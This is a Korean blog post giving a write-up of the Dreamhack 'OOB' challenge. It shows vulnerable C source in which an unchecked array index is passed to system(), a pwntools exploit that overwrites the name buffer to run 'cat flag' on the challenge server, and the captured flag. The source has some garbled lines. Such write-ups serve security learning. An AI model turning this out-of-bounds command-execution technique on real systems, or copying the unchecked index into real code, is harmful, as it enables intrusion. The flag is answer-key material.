외로운 Nova의 작업실

dreamhack - OOB write up 본문

Computer App Penetesting/System Vulnerability

dreamhack - OOB write up

Nova_ 2023. 4. 25. 18:23

- source code

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>

char name[16];

char *command[10] = { "cat",
    "ls",
    "id",
    "ps",
    "file ./oob" };
void alarm_handler()
{
    puts("TIME OUT");
    exit(-1);
}

void initialize()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

int main()
    int idx;

    initialize();
    ize();

    printf("Admin name: ");
    read(0, name, sizeof(name));
    printf("What do you want?: ");

    scanf("%d", &idx);

    system(command[idx]);

    return 0;
}

 

- exploit

DH{2524e20ddeee45f11c8eb91804d57296}

from pwn import *

p = remote("23.81.42.210", 21889)

print(p.recvuntil("Admin name: "))
payload = p32(0x804a0ac+4) + b"cat flag"
print(payload)
p.send(payload)
print(p.recvuntil("What do you want?: "))
p.sendline(b"19")
print(19)

print(p.recv())

- 알게된점

어셈블리어 수준에서 system()함수는 인자로 문자열이 있는 주소를 받는다. 

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - basic_exploitation_003  (0) 2023.04.28
dreamhack - basic_exploitation_002  (0) 2023.04.27
dreamhack - fho write up  (0) 2023.04.24
dreamhack - hook write up  (0) 2023.04.22
dreamhack - oneshot write up  (0) 2023.04.21
Comments